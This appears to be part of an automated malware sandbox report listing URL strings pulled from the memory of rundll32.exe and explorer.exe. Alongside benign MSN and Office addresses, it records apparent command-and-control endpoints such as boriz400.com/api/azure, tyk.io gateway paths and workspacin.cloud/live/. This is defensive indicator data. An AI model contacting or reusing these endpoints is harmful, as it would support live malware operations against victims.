Source: explorer.exe, 00000016.00000000.1847916203.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.2940539964.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.2942821965.00000000097D4000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
Source: explorer.exe, 00000016.00000000.1847916203.00000000096DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.2942821965.00000000096DF000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://arc.msn.comi
Source: explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://assets.msn.com/staticsb/statics/latest/traffic/Notification/desktop/svg/RoadHazard.svg
Source: explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings
Source: explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg
Source: explorer.exe, 00000016.00000002.2940539964.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/humidity.svg
Source: rundll32.exe, 00000012.00000003.2397236802.00000292115AE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://boriz400.com/
Source: rundll32.exe, 00000012.00000003.2810418995.000002921159F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000002.2938154508.000002921159F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2284190577.000002921159F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2397236802.000002921159E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2762031046.000002921159F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2415718994.000002921159F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2797091473.000002921159F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2311847302.000002921159F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://boriz400.com/api/azure
Source: rundll32.exe, 00000012.00000003.2762031046.00000292115AE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2810418995.00000292115AE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2738453835.00000292115BB000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1882651450.00000292115BC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2680109233.00000292115BB000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2415718994.00000292115AE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2284190577.00000292115AE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2311847302.00000292115AE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2797091473.00000292115AE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000002.2938154508.00000292115AE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2397236802.00000292115AE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://boriz400.com/api/azure8
Source: rundll32.exe, 00000012.00000003.2762031046.00000292115AE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2810418995.00000292115AE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2738453835.00000292115BB000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1882651450.00000292115BC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2680109233.00000292115BB000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2415718994.00000292115AE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2284190577.00000292115AE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2311847302.00000292115AE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2797091473.00000292115AE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000002.2938154508.00000292115AE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2397236802.00000292115AE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://boriz400.com/api/azurey
Source: rundll32.exe, 00000012.00000003.2738453835.000002921161C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://boriz400.com/content.php
Source: rundll32.exe, 00000012.00000003.2415718994.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2397236802.000002921161C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://boriz400.com/qa
Source: explorer.exe, 00000016.00000002.2940539964.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV
Source: explorer.exe, 00000016.00000002.2940539964.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark
Source: explorer.exe, 00000016.00000000.1846357884.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.2940539964.00000000078AD000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu
Source: explorer.exe, 00000016.00000000.1846357884.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.2940539964.00000000078AD000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu-dark
Source: explorer.exe, 00000016.00000002.2940539964.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu
Source: explorer.exe, 00000016.00000002.2940539964.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu-dark
Source: explorer.exe, 00000016.00000002.2940539964.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY
Source: explorer.exe, 00000016.00000002.2940539964.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY-dark
Source: explorer.exe, 00000016.00000002.2945734291.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1859052974.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://excel.office.com
Source: explorer.exe, 00000016.00000002.2945125604.000000000B4AE000.00000004.00000010.00020000.00000000.sdmp String found in binary or memory: https://illoskanawer.com/live/
Source: explorer.exe, 00000016.00000002.2940539964.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15Yat4.img
Source: explorer.exe, 00000016.00000002.2940539964.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1hlXIY.img
Source: explorer.exe, 00000016.00000002.2940539964.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAKSoFp.img
Source: explorer.exe, 00000016.00000002.2940539964.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAXaopi.img
Source: explorer.exe, 00000016.00000002.2940539964.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAgi0nZ.img
Source: explorer.exe, 00000016.00000002.2940539964.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBqlLky.img
Source: explorer.exe, 00000016.00000000.1846357884.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.2940539964.00000000078AD000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.img
Source: explorer.exe, 00000016.00000002.2945734291.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1859052974.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://outlook.com_
Source: explorer.exe, 00000016.00000002.2945734291.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1859052974.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://powerpoint.office.comcember
Source: rundll32.exe, 00000012.00000003.1868997096.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2415718994.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2680109233.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2762031046.00000292115AE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000002.2938154508.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2762031046.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1882651450.00000292115BC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2797091473.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2311970800.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2397236802.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2001079033.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2810418995.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2738453835.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2284307888.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1882552320.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2042061481.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1991839967.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1867444760.000002921161C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ridiculous-breakpoint-gw.aws-use1.cloud-ara.tyk.io/
Source: rundll32.exe, 00000012.00000003.1867444760.000002921161C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ridiculous-breakpoint-gw.aws-use1.cloud-ara.tyk.io/api/azure
Source: rundll32.exe, 00000012.00000003.1991839967.000002921161C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ridiculous-breakpoint-gw.aws-use1.cloud-ara.tyk.io/content.php
Source: rundll32.exe, 00000012.00000003.2284190577.000002921159F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2762031046.000002921159F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2311847302.000002921159F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ridiculous-breakpoint-gw.aws-use1.cloud-ara.tyk.io/content.php4
Source: rundll32.exe, 00000012.00000003.2284190577.00000292115AE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ridiculous-breakpoint-gw.aws-use1.cloud-ara.tyk.io/content.phpA
Source: rundll32.exe, 00000012.00000003.2810418995.000002921159F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000002.2938154508.000002921159F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2762031046.000002921159F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2797091473.000002921159F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ridiculous-breakpoint-gw.aws-use1.cloud-ara.tyk.io/content.phpL
Source: rundll32.exe, 00000012.00000003.2762031046.000002921161C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ridiculous-breakpoint-gw.aws-use1.cloud-ara.tyk.io/content.phpLgF
Source: rundll32.exe, 00000012.00000003.1991839967.000002921161C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ridiculous-breakpoint-gw.aws-use1.cloud-ara.tyk.io/content.phpMfE
Source: rundll32.exe, 00000012.00000003.2001079033.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1991839967.000002921161C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ridiculous-breakpoint-gw.aws-use1.cloud-ara.tyk.io/n
Source: explorer.exe, 00000016.00000002.2940539964.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://simpleflying.com/how-do-you-become-an-air-traffic-controller/
Source: rundll32.exe, 00000012.00000003.2797091473.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2042061481.00000292115EF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2311970800.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2397236802.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2810418995.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2397236802.00000292115EF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2738453835.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2284307888.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2810418995.00000292115EF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2797091473.00000292115EF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2042061481.000002921161C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io/
Source: rundll32.exe, 00000012.00000003.2810418995.00000292115EF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2797091473.00000292115EF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io/5/
Source: rundll32.exe, 00000012.00000002.2938154508.000002921161C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io/F
Source: rundll32.exe, 00000012.00000003.2042061481.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2491436893.000002921163E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io/api/azure
Source: rundll32.exe, 00000012.00000002.2938154508.00000292115EF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io/api/azure(
Source: rundll32.exe, 00000012.00000003.2397236802.000002921161C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io/api/azure.php
Source: rundll32.exe, 00000012.00000002.2938154508.000002921161C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io/api/azure/j
Source: rundll32.exe, 00000012.00000003.2680109233.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2762031046.000002921163E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2797600040.000002921163E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2738453835.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2491436893.000002921163E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io/api/azure4
Source: rundll32.exe, 00000012.00000003.2415718994.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2680109233.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2810618243.000002921163E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000002.2938154508.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2311970800.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2397236802.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2762031046.000002921163E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2797600040.000002921163E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2738453835.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2284307888.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2042061481.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2491436893.000002921163E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io/api/azure=
Source: rundll32.exe, 00000012.00000003.2797091473.000002921161C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io/api/azureY
Source: rundll32.exe, 00000012.00000003.2415718994.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2680109233.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2810618243.000002921163E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000002.2938154508.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2311970800.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2397236802.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2762031046.000002921163E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2797600040.000002921163E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2738453835.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2284307888.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2042061481.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2491436893.000002921163E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io/api/azurej
Source: rundll32.exe, 00000012.00000003.2797091473.000002921161C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io/api/azurent.php
Source: rundll32.exe, 00000012.00000003.2810618243.000002921163E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2797600040.000002921163E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io/api/azurep&j
Source: rundll32.exe, 00000012.00000003.2415718994.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2680109233.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2397236802.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2762031046.000002921163E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2797600040.000002921163E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2738453835.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2491436893.000002921163E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io/api/azurep1j
Source: rundll32.exe, 00000012.00000003.2397236802.000002921161C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io/api/azurep://www.
Source: rundll32.exe, 00000012.00000003.2415718994.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2397236802.000002921161C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io/api/azurepP
Source: rundll32.exe, 00000012.00000003.2415718994.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2311970800.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2397236802.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2284307888.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2491436893.000002921163E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io/api/azurepjB
Source: rundll32.exe, 00000012.00000003.2415718994.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2680109233.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2680109233.00000292115EE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2810618243.000002921163E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000002.2938154508.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2311970800.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2397236802.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2762031046.000002921163E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2797600040.000002921163E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2738453835.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2491436893.000002921163E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io/content.php
Source: rundll32.exe, 00000012.00000003.2311970800.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2491436893.000002921163E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io/content.php&j
Source: rundll32.exe, 00000012.00000003.2311970800.00000292115EF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io/content.php(
Source: rundll32.exe, 00000012.00000003.2311970800.000002921161C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io/content.php1j
Source: rundll32.exe, 00000012.00000003.2311970800.000002921161C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io/content.php4
Source: rundll32.exe, 00000012.00000003.2680109233.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2311970800.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2762031046.000002921163E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2797600040.000002921163E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2738453835.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2491436893.000002921163E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io/content.phpP
Source: rundll32.exe, 00000012.00000003.2797091473.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2810418995.000002921161C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io/f
Source: rundll32.exe, 00000012.00000003.2680109233.00000292115EE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2415718994.00000292115EF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2311970800.00000292115EF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2284190577.00000292115EF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2397236802.00000292115EF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io/uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io
Source: explorer.exe, 00000016.00000002.2940539964.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
Source: explorer.exe, 00000016.00000002.2940539964.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
Source: explorer.exe, 00000016.00000000.1859052974.000000000C557000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.2945734291.000000000C557000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://wns.windows.com/L
Source: explorer.exe, 00000016.00000002.2945734291.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1859052974.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://word.office.com
Source: explorer.exe, 00000016.00000002.2945734291.000000000C54A000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://workspacin.cloud/
Source: explorer.exe, 00000016.00000002.2947027390.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://workspacin.cloud/live/
Source: explorer.exe, 00000016.00000002.2943554599.00000000098A8000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://workspacin.cloud/live/0vaH
Source: explorer.exe, 00000016.00000002.2947027390.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://workspacin.cloud/live/6
Source: explorer.exe, 00000016.00000002.2947027390.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://workspacin.cloud/live/J5
Source: explorer.exe, 00000016.00000002.2940539964.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/lifestyle/lifestyle-buzz/biden-makes-decision-that-will-impact-more-than-1
Source: explorer.exe, 00000016.00000002.2940539964.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/lifestyle/travel/i-ve-worked-at-a-campsite-for-5-years-these-are-the-15-mi
